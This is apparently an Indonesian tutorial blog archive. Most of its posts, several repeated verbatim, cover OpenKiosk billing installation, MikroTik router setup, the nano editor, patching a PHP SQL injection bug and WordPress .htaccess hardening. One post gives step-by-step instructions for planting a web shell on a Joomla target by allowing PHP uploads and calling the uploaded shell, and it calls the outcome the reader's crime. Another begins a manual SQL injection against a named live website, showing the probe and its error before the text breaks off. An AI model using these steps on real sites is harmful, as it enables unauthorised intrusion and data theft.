Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts

Wednesday, 19 January 2011

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

Tuesday, 11 January 2011

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS™ merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS� merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS� merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Monday, 10 January 2011

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

Thursday, 6 January 2011

Patch SQL Injection

SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan :

http://site.com/index.php?list=berita&de=14

Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:

Seperti yang kita ketahui bugnya ada di http://site.com/index.php?list=berita&de=14 , lebih tepatnya yg menyebabkan ini semua terjadi adalah file berita.php dan string de, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :


Bugnya ada di script bagian ini :

$iddetail = $_GET['de'];

Tidak adanya filter di $_GET[‘de’] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

Lalu ganti script $iddetail = $_GET['de']; menjadi $iddetail = $de; Untuk script lengkapnya bias di download disini. Sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra.. proses patching telah berhasil.

Greats :

All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You

Patch SQL Injection

SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan :

http://site.com/index.php?list=berita&de=14

Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:

Seperti yang kita ketahui bugnya ada di http://site.com/index.php?list=berita&de=14 , lebih tepatnya yg menyebabkan ini semua terjadi adalah file berita.php dan string de, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :


Bugnya ada di script bagian ini :

$iddetail = $_GET['de'];

Tidak adanya filter di $_GET[�de�] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

Lalu ganti script $iddetail = $_GET['de']; menjadi $iddetail = $de; Untuk script lengkapnya bias di download disini. Sekarang coba buka lagi page vulnerable dan tambahkan single quote(�) dan tarra.. proses patching telah berhasil.

Greats :

All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You

Patch SQL Injection

SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan :

http://site.com/index.php?list=berita&de=14

Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:

Seperti yang kita ketahui bugnya ada di http://site.com/index.php?list=berita&de=14 , lebih tepatnya yg menyebabkan ini semua terjadi adalah file berita.php dan string de, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :


Bugnya ada di script bagian ini :

$iddetail = $_GET['de'];

Tidak adanya filter di $_GET[�de�] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

Lalu ganti script $iddetail = $_GET['de']; menjadi $iddetail = $de; Untuk script lengkapnya bias di download disini. Sekarang coba buka lagi page vulnerable dan tambahkan single quote(�) dan tarra.. proses patching telah berhasil.

Greats :

All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You

Saturday, 1 January 2011

Install Mikrotik Sebagai Gateway

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC


2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)

Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin
dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “killnine” (nama ini bebas terserah kalau mau diganti)
[admin@Mikrotik] > system identity set name=killnine
[admin@killnine] >

5. Melihat interface pada Mikrotik Router
[admin@killnine] > interface print
Flags: X – disabled, D – dynamic, R – running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@killnine] >

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254

[admin@killnine] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@killnine] > ip address add address=192.168.0.254
netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@killnine] >ip address print
Flags: X – disabled, I – invalid, D – dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2
[admin@killnine] >

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1
[admin@killnine] > /ip route add gateway=192.168.1.1


9. Melihat Tabel routing pada Mikrotik Routers
[admin@killnine] > ip route print
Flags: X – disabled, A – active, D – dynamic,
C – connect, S – static, r – rip, b – bgp, o – ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 192.168.0.0/24 192.168.0.254 ether2
1 ADC 192.168.0.0/24 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.1.1 ether1
[admin@killnine] >

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@killnine] > ping 192.168.1.1
192.168.1.1 64 byte ping: ttl=64 time<1>
192.168.1.1 64 byte ping: ttl=64 time<1>
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@killnine] >

11. Setup DNS pada Mikrotik Routers
[admin@killnine] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=no
[admin@killnine] > ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no

12. Melihat konfigurasi DNS
[admin@killnine] > ip dns print
primary-dns: 202.134.0.155
secondary-dns: 202.134.1.10
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@killnine] >

13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@killnine] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@killnine] >

Jika sudah berhasil reply berarti seting DNS sudah benar.

14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@killnine]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@killnine] >

15. Melihat konfigurasi Masquerading
[admin@killnine]>ip firewall nat print
Flags: X – disabled, I – invalid, D – dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@XAVIERO] >

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server.

Install Mikrotik Sebagai Gateway

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC


2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)

Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin
dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi �killnine� (nama ini bebas terserah kalau mau diganti)
[admin@Mikrotik] > system identity set name=killnine
[admin@killnine] >

5. Melihat interface pada Mikrotik Router
[admin@killnine] > interface print
Flags: X � disabled, D � dynamic, R � running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@killnine] >

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254

[admin@killnine] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@killnine] > ip address add address=192.168.0.254
netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@killnine] >ip address print
Flags: X � disabled, I � invalid, D � dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2
[admin@killnine] >

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1
[admin@killnine] > /ip route add gateway=192.168.1.1


9. Melihat Tabel routing pada Mikrotik Routers
[admin@killnine] > ip route print
Flags: X � disabled, A � active, D � dynamic,
C � connect, S � static, r � rip, b � bgp, o � ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 192.168.0.0/24 192.168.0.254 ether2
1 ADC 192.168.0.0/24 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.1.1 ether1
[admin@killnine] >

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@killnine] > ping 192.168.1.1
192.168.1.1 64 byte ping: ttl=64 time<1>
192.168.1.1 64 byte ping: ttl=64 time<1>
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@killnine] >

11. Setup DNS pada Mikrotik Routers
[admin@killnine] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=no
[admin@killnine] > ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no

12. Melihat konfigurasi DNS
[admin@killnine] > ip dns print
primary-dns: 202.134.0.155
secondary-dns: 202.134.1.10
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@killnine] >

13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@killnine] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@killnine] >

Jika sudah berhasil reply berarti seting DNS sudah benar.

14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@killnine]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@killnine] >

15. Melihat konfigurasi Masquerading
[admin@killnine]>ip firewall nat print
Flags: X � disabled, I � invalid, D � dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@XAVIERO] >

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server.

Sunday, 26 December 2010

Easy Upload Shell in Joomla

Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin setting biar tidak ada aplikasi yang boleh di install, nah ini caranya gan, lebih praktis juga loh. Langsung aja lah..

Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.
jangan lupa kopi + rokok, biar lancar awkakwkakwkawk

1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak dibagian tengah, atau klik site > pilih Global Configuration, kalau udah Pilih System, lihat gambar dibawah ini.

2. Pada bagian Media Settings, Legal Extensions (File Types) kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP atau ODG ada juga JPG. Rubahlah jadi PHP, kalau sudah liaht pada bagian Restrict Uploads dan Check MIME Types, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.
Perhatiin pada bagian Legal MIME Types nah pada bagian disitu kan banyak tuh tulisan kayak image/jpeg,image/gif,image dll lah, pilih pada bagian belakang klo gak salah X-ZIP atau yang mana aja terserah pokoknya rubah jadi PHP. Kalau sudah di save then NEXT STEP.

3. Pada langkah nomor 2 kalau berahasil ada tulisan “The Global Configuration details have been updated.” klo gagal “An Error has occurred! Unable to open configuration.php file to write!”.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.
disini kita ngomongin yang berhasil, kalau berahasil pilih MEDIA MANAGER. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php
kalau sukses, hasilnya seperti screen shoot dibawah ini..

4. Selanjutnya pemanggilan URL shell nya seperti ini: http://[localhost]/images/shell.php

Mudah kan,gagaga...selamat menikmati hasil kejahatan anda..
Just share buat newbie,yang udah mastah dilarang keras baca ini artikel..!!

Protect WordPress Directory with .Htaccess

Kembali lagi ma ane gan, kali ini kita membahas soal keamanan wordpress,kita membahas salah satu keamanan seperti judul di atas, dengan file .htaccess. Mungkin banyak yang sudah tahu atau yang sudah membahas tentang ini,tapi tidak ada salahnya jika mau dishare lagi.. :D

Mari kita bahas tentang file .htaccess,apa itu .htacess..? file .htaccess adalah file teks ASCII yang terletak di dalam root direktori biasanya “public_html” atau klo hosting free di “htdocsyang sering digunakan untuk mengubah pengaturan default dari web server yang digunakan. Sehingga manfaat dari file .htaccess ini besar sekali. Dan merupakan Web Utility yang sering digunakan oleh para web master.
lalu apa saja yang harus di amankan di wordpress.?bnyak gan,conthnya /wp-admin,/wp-includes,wp-login.php,wp-db.php,wp-config.php ./etc..
langsung aja gan, source code yang nanti ane kasih agan tinggal copy lalu paste aja di .htaccess,udah tahu kali.. :D

Akses halaman /Wp-Admin Login dengan Private IP/Single IP

AuthUserFile /dev/null

AuthGroupFile /dev/null

AuthName “Access Control”

AuthType Basic

order deny,allow

deny from all

# IP address sobat

allow from **.***.***.**

Coba perhatikan sama huruf yang berwarna merah itu gan, **.***.***.** rubah sama IP agan,jadi khusus satu IP aja yang bisa akses halaman itu.. :D
Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm tenang gan, kita lanjut ke wp-login.php, pake private IP juga.. :D

Order deny,allow

Deny from All

Allow from **.***.***.**

sama seperti diatas, ganti tulisan yang berwarna merah pake IP agan, kalau buat yang IP nya dinamis mending tidak usah, coz itu cuma buat satu IP doanq,

Amankan Wp-Config.php

Lanjut gan,sekarang kita mw amanin file wp-config.php,dh tahu kan wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. :D
nih codenya..

# protect wpconfig.php

order allow,deny

deny from all

Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang bisa ngebongkar semua data penting kita gan,
buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti terjadi error gitu kan, klo emang disitu kelemahanya marilah kita tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus isi sama code ini..


RewriteEngine On
RewriteBase /
RewriteRule .*\.php$ readme.html [L]

Perhatikan sama tulisan yang berwarna merah itu, itu file readme dari wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara di atas.

Ok selesai,semoga bermanfaat dan berguna.. :D

Tuesday, 14 December 2010

Manual SQL Injection Tutorial

Manual SQL Injection Tutorial

By : arianom Kill-9 Crew


Target : http://www.natoleo.com/Content.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com

http://www.natoleo.com/Content.php?id=14

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)


